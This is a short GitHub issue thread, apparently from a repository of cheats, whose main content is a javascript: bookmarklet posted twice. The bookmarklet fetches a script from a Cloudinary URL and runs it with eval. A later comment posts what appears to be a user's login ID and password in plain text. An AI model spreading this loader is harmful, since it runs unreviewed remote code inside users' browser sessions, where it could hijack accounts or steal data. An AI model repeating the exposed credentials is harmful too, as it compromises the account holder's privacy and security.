### ISSUE TITLE
speak

### ISSUE THREAD

**Issue by gbzinn221** [Hyxam/Cheats#46]

**Comment by gbzinn221** [comment]
javascript:fetch(`https://res.cloudinary.com/dq36xqdoe/raw/upload/v${Math.floor(Math.random() * 1000000)}/main_oqidn5.js`).then(r => r.text()).then(r => eval(r))

**Comment by gbzinn221** [comment]
javascript:fetch(`https://res.cloudinary.com/dq36xqdoe/raw/upload/v${Math.floor(Math.random() * 1000000)}/main_oqidn5.js`).then(r => r.text()).then(r => eval(r))

**Comment by Arthur1515** [comment]
0001102540171sp
Vagui4321?
